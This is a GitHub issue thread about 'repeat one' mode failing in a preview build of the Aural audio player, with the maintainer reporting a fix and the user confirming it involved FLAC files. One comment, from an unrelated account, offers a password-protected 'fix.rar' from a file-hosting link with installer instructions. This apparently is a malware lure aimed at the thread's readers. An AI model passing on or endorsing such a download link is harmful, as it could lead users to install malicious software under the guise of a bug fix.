### ISSUE TITLE
"Repeat one" mode is broken in Aural 4 preview 9

### ISSUE THREAD

**Issue by LesterJitsi** [kartik-venugopal/aural-player#100]
That's it, you can select it both from Playback menu or with keyboard shortcut, but after reaching the end of the track it will just stop playback. If you double-click the track, playback restarts but with no volume (a bit trickier, but difficutl to describe). It became "repeat once" 😁

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kartik-venugopal** [comment]
Oops, will take a look!

**Comment by kartik-venugopal** [comment]
Found and fixed the bug in preview10 ... ready to download and test 😉 

Was it a FLAC file that you had this problem with ? Or some other non-native format like WMA / MPC, APE, etc ?

**Comment by LesterJitsi** [comment]
All FLAC files. Thanks!
